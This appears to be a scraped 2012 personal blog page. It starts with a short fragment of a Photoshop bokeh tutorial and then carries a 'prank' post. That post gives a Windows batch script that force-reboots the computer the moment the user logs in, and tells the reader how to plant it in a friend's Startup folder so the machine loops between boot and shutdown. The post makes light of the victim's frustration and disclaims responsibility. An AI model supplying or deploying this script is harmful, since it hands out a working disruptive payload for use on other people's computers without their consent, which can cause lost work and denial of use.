Wednesday, 11 April 2012


Create a new document in Photoshop. As usual I will use a nice HD screen resolution, 1980x1080 pixels. Fill the background layer with a very dark grey, not black. If you fill it with black the effect won't work. Besides, absolute black is boring. The color I used was #262626.
Digital Bokeh in Photoshop

Step 2

Saturday, 25 February 2012

REBOOT LOOP {MWUAHAHA} - Batch on shuffle

To pull this .bat prank off all you need to do is open notepad and paste this in there:

@echo off
color 0c
Title Here it goes again (ha. ha.)
shutdown -r -f -t 0
echo ha.
Ping localhost -n 2 >nul

So now what you wanna do is go to Save as and on file type change it from .txt to all files. At the end of the file name put .bat (this'll save it as a batch file)

Now drag it to the start icon (bottom left of your screen) > All programs > And drop it inside "Startup".

Now what this will do is reboot the computer as soon as it signs in to the user you did it in.
If it the pc signs in automatically, this will result in a never ending loop between boot and shutdown.
Loads of fun to see your friend's face if frustation, however, don't blame me if you get your face punched.

To get rid of it, boot up in safe mode, go to the startup folder and delete the file.

I am not responsible for anything you do with it.